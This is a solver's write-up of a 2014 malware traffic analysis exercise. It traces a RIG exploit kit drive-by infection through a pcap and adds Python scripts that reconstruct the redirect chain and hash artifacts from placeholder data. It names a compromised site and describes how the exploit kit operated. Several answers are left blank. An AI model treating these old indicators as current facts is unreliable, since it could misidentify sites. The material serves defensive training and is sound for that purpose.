Malware-Traffic-Analysis.net - 2014-11-16 - Traffic analysis exercise
This is not a record of the thought process used to solve the exercise, only a record of the evidence behind each answer.
LEVEL 1 QUESTIONS:
What is the IP address of the Windows VM that gets infected?
From experience, a capture that contains both public and private addresses was taken at the gateway, so the infected VM must have one of the private addresses seen in the capture.
Judging by the volume of traffic, it is most likely 172.16.165.165.
Some of these private IPs belong to hosts and some to routers/switches, and NBNS tells them apart: NetBIOS name registrations and queries are broadcast to the local subnet by the Windows host itself, and network devices do not speak NBNS, so the source address of NBNS traffic is a Windows endpoint (the registration also carries the host's NetBIOS name, which answers the host name question below).
Therefore 172.16.165.165 is the endpoint and the other two are network devices. Checking 172.16.165.254 further,
172.16.165.254 turns out to be the DHCP server (it is the source of the DHCP Offer/ACK messages).
So the compromised host is confirmed as 172.16.165.165.
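The Level 1 reasoning above (private addresses only, NBNS senders are Windows endpoints, the DHCP Offer/ACK source is the server, byte volume breaks ties) written out as code, as an added example that is not part of the original write-up. It runs over a constructed packet summary in the shape a `tshark -T fields` export would give; the hostname, MAC addresses, lengths and the gateway/web addresses are invented here and are not values from the exercise pcap. In Wireshark the equivalent views are the `nbns` and `dhcp` (older versions: `bootp`) display filters plus Statistics > Conversations.

```python
"""Added example: infer the infected endpoint, its hostname and MAC from a
constructed packet summary (NOT the exercise pcap)."""
import ipaddress
from collections import Counter

RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed packet summary: one dict per packet (src/dst IP, Ethernet source,
# dissector name, frame length, Info column).  All values are made up.
PACKETS = [
    # DHCP lease: the client broadcasts Discover/Request, the server answers Offer/ACK
    {"src": "0.0.0.0", "dst": "255.255.255.255", "src_mac": "00:0c:29:11:22:33", "proto": "dhcp", "len": 342, "info": "Discover"},
    {"src": "172.16.165.254", "dst": "172.16.165.165", "src_mac": "00:50:56:aa:bb:cc", "proto": "dhcp", "len": 342, "info": "Offer"},
    {"src": "0.0.0.0", "dst": "255.255.255.255", "src_mac": "00:0c:29:11:22:33", "proto": "dhcp", "len": 342, "info": "Request"},
    {"src": "172.16.165.254", "dst": "172.16.165.165", "src_mac": "00:50:56:aa:bb:cc", "proto": "dhcp", "len": 342, "info": "ACK"},
    # NBNS name registration is broadcast by the Windows host itself
    {"src": "172.16.165.165", "dst": "172.16.165.255", "src_mac": "00:0c:29:11:22:33", "proto": "nbns", "len": 110, "info": "Registration NB LAB-WIN7-VM<00>"},
    {"src": "172.16.165.165", "dst": "172.16.165.255", "src_mac": "00:0c:29:11:22:33", "proto": "nbns", "len": 110, "info": "Registration NB LAB-WIN7-VM<20>"},
    # the gateway only ever shows up as the source of an ICMP error
    {"src": "172.16.165.1", "dst": "172.16.165.165", "src_mac": "00:50:56:dd:ee:ff", "proto": "icmp", "len": 70, "info": "Destination unreachable"},
    # web traffic to a public address (documentation range, constructed)
    {"src": "172.16.165.165", "dst": "203.0.113.10", "src_mac": "00:0c:29:11:22:33", "proto": "http", "len": 420, "info": "GET / HTTP/1.1"},
    {"src": "203.0.113.10", "dst": "172.16.165.165", "src_mac": "00:50:56:dd:ee:ff", "proto": "http", "len": 1514, "info": "HTTP/1.1 200 OK"},
    {"src": "203.0.113.10", "dst": "172.16.165.165", "src_mac": "00:50:56:dd:ee:ff", "proto": "http", "len": 1514, "info": "Continuation"},
]


def is_rfc1918(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in RFC1918)


def private_sources(packets):
    """Private addresses that actually send packets; the victim is one of these."""
    return {p["src"] for p in packets if is_rfc1918(p["src"])}


def dhcp_servers(packets):
    """Only a DHCP server sends Offer/ACK, so its source IP identifies it."""
    return {p["src"] for p in packets if p["proto"] == "dhcp" and p["info"] in ("Offer", "ACK")}


def nbns_speakers(packets):
    """Network devices do not speak NBNS; these sources are Windows endpoints."""
    return {p["src"] for p in packets if p["proto"] == "nbns"}


def bytes_by_source(packets):
    volume = Counter()
    for p in packets:
        volume[p["src"]] += p["len"]
    return volume


def infer_infected_host(packets):
    """Private NBNS speaker that is not the DHCP server, largest sender first."""
    candidates = (private_sources(packets) & nbns_speakers(packets)) - dhcp_servers(packets)
    volume = bytes_by_source(packets)
    return max(candidates, key=lambda ip: volume[ip])


def host_identity(packets, ip):
    """Hostname from the NBNS registration, MAC from the host's own Ethernet frames."""
    names, macs = set(), set()
    for p in packets:
        if p["src"] != ip:
            continue
        macs.add(p["src_mac"])
        if p["proto"] == "nbns" and "Registration NB " in p["info"]:
            # Info looks like "Registration NB NAME<00>"; strip the NetBIOS suffix
            names.add(p["info"].split("Registration NB ", 1)[1].split("<", 1)[0].strip())
    return {"ip": ip, "hostnames": sorted(names), "macs": sorted(macs)}


if __name__ == "__main__":
    victim = infer_infected_host(PACKETS)
    print("DHCP server(s):", dhcp_servers(PACKETS))
    print("infected VM:", host_identity(PACKETS, victim))
```

The DHCP Offer/ACK rule and the NBNS rule are independent checks; on a real capture, confirm that the host they point to is also the one whose conversations carry the web traffic before trusting either.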
What is the host name of the Windows VM that gets infected?
What is the MAC address of the infected VM?
What is the IP address of the compromised web site?
After exporting the response for that page, the antivirus flagged it immediately, so this is the compromised web site.
What is the domain name of the compromised web site?
What is the IP address and domain name that delivered the exploit kit and malware?
Continuing through the request list, a .jar file was requested.
After downloading it, the antivirus flagged it.
So that site is the one delivering the attack payload.
Another approach is to export all HTTP objects (File > Export Objects > HTTP) and run an antivirus scan over the whole export directory.
The Referer header then points back to the site that references the malicious domain.
LEVEL 2 QUESTIONS:
What is the redirect URL that points to the exploit kit (EK) landing page?
The Referer header of the first request to the stand. domain.
Besides the landing page (which contains the CVE-2013-2551 IE exploit), what other exploit(s) were sent by the EK?
Java and Flash.
How many times was the payload delivered?
3 times. In order, they are:
Submit the pcap to VirusTotal and find out what snort alerts triggered. What EK names are shown in the Suricata alerts?
Submit the capture to VirusTotal and read the alert output.
LEVEL 3 QUESTIONS:
Checking my website, what have I (and others) been calling this exploit kit?
I didn't know this one; the answer says RIG EK.
What file or page from the compromised website has the malicious script with the URL for the redirect?
The response to http://www.ciniholland.nl/
This also exposed a Wireshark shortcoming: there is no convenient full-text search of the data portion across many packets (and a gzip-encoded response body will not match a raw byte search anyway).
A workaround is to add the whole exported-objects folder to VS Code and use its global search (or grep -r over the directory).
Extract the exploit file(s). What is(are) the md5 file hash(es)?
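The Level 2 and Level 3 checks above (Referer of the first request to the EK host, the redirect chain back to the compromised site, which response body carries the redirect URL, how many times the payload was delivered, and the MD5 of each exploit file) as one script, an added example that is not part of the original write-up. It runs over constructed HTTP transactions: www.ciniholland.nl is the compromised site named on this page, but `adverts.example`, `ek.example` (standing in for the truncated stand. domain), the URIs and all response bodies are invented here. In practice the bodies come from File > Export Objects > HTTP or `tshark --export-objects http,<dir>`; the compromised page is stored gzip-encoded to show why a search must run on the decoded body.

```python
"""Added example: referer chain, redirect source, payload count and exploit
hashes over constructed HTTP transactions (NOT the exercise pcap)."""
import gzip
import hashlib

EK_HOST = "ek.example"                                  # placeholder for the EK domain
REDIRECT_URL = "http://adverts.example/redirect.php"    # placeholder redirect URL
LANDING_URL = f"http://{EK_HOST}/landing.php"

# Constructed response bodies.
INJECTED_HTML = (b"<html><body>Welcome</body>"
                 b'<script src="' + REDIRECT_URL.encode() + b'"></script></html>')
REDIRECT_JS = b'document.write(\'<iframe src="' + LANDING_URL.encode() + b'"></iframe>\');'
LANDING_HTML = b'<applet code="a.class" archive="/x.jar"></applet><embed src="/x.swf">'
PAYLOAD_EXE = b"MZ\x90\x00" + b"\x00" * 60   # fake PE stub, same file served three times
JAR_FILE = b"PK\x03\x04" + b"\x00" * 26      # zip magic = Java archive
SWF_FILE = b"CWS\x0a" + b"\x00" * 12         # compressed Flash magic


def tx(host, uri, referer=None, body=b"", gzipped=False):
    """One request/response pair as an HTTP object export would show it."""
    return {"url": f"http://{host}{uri}", "host": host, "referer": referer,
            "body": gzip.compress(body) if gzipped else body, "gzip": gzipped}


TRANSACTIONS = [
    tx("www.ciniholland.nl", "/", None, INJECTED_HTML, gzipped=True),   # typed by the user
    tx("adverts.example", "/redirect.php", "http://www.ciniholland.nl/", REDIRECT_JS),
    tx(EK_HOST, "/landing.php", REDIRECT_URL, LANDING_HTML),
    tx(EK_HOST, "/x.jar", LANDING_URL, JAR_FILE),
    tx(EK_HOST, "/x.swf", LANDING_URL, SWF_FILE),
    tx(EK_HOST, "/load.php?n=1", LANDING_URL, PAYLOAD_EXE),
    tx(EK_HOST, "/load.php?n=2", LANDING_URL, PAYLOAD_EXE),
    tx(EK_HOST, "/load.php?n=3", LANDING_URL, PAYLOAD_EXE),
]


def decoded_body(t):
    """Search and hash what the browser saw, not the compressed wire bytes."""
    return gzip.decompress(t["body"]) if t["gzip"] else t["body"]


def first_request_referer(transactions, host):
    """Level 2: the Referer of the first request to the EK host is the redirect URL."""
    for t in transactions:
        if t["host"] == host:
            return t["referer"]
    return None


def redirect_chain(transactions, url):
    """Walk Referer headers backwards from `url` to the page the victim typed in."""
    by_url = {t["url"]: t for t in transactions}
    chain, seen = [url], {url}
    while url in by_url and by_url[url]["referer"] and by_url[url]["referer"] not in seen:
        url = by_url[url]["referer"]
        seen.add(url)
        chain.append(url)
    return chain[::-1]


def pages_containing(transactions, needle):
    """Level 3: which response body carries the script that points at the redirect URL."""
    return [t["url"] for t in transactions if needle.encode() in decoded_body(t)]


MAGIC = ((b"MZ", "exe"), (b"PK\x03\x04", "jar"), (b"CWS", "swf"), (b"FWS", "swf"), (b"ZWS", "swf"))


def file_kind(body):
    """Classify by magic bytes; EKs lie in both Content-Type and the URL."""
    return next((kind for magic, kind in MAGIC if body.startswith(magic)), "other")


def exploit_artifacts(transactions):
    """Every jar/swf/exe response with its MD5, plus the page that loaded it."""
    out = []
    for t in transactions:
        body = decoded_body(t)
        kind = file_kind(body)
        if kind != "other":
            out.append({"url": t["url"], "kind": kind,
                        "md5": hashlib.md5(body).hexdigest(), "referer": t["referer"]})
    return out


def payload_deliveries(transactions):
    """Level 2: each executable response is one delivery of the payload."""
    return [a for a in exploit_artifacts(transactions) if a["kind"] == "exe"]


if __name__ == "__main__":
    print("redirect URL:", first_request_referer(TRANSACTIONS, EK_HOST))
    print("chain:", " -> ".join(redirect_chain(TRANSACTIONS, LANDING_URL)))
    print("injected page:", pages_containing(TRANSACTIONS, REDIRECT_URL))
    for a in exploit_artifacts(TRANSACTIONS):
        print(a["kind"], a["md5"], a["url"])
    print("payload delivered", len(payload_deliveries(TRANSACTIONS)), "times")
```

Classifying by magic bytes rather than by extension or Content-Type is deliberate: EK payload URLs rarely end in .exe, and the same file served several times hashes to the same MD5, which is how the three deliveries are tied to one sample.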
VirusTotal doesn't show all the VRT rules under the "Snort alerts" section for the pcap analysis. If you run your own version of Snort with the VRT ruleset as a registered user (or a subscriber), what VRT rules fire?
Not attempted.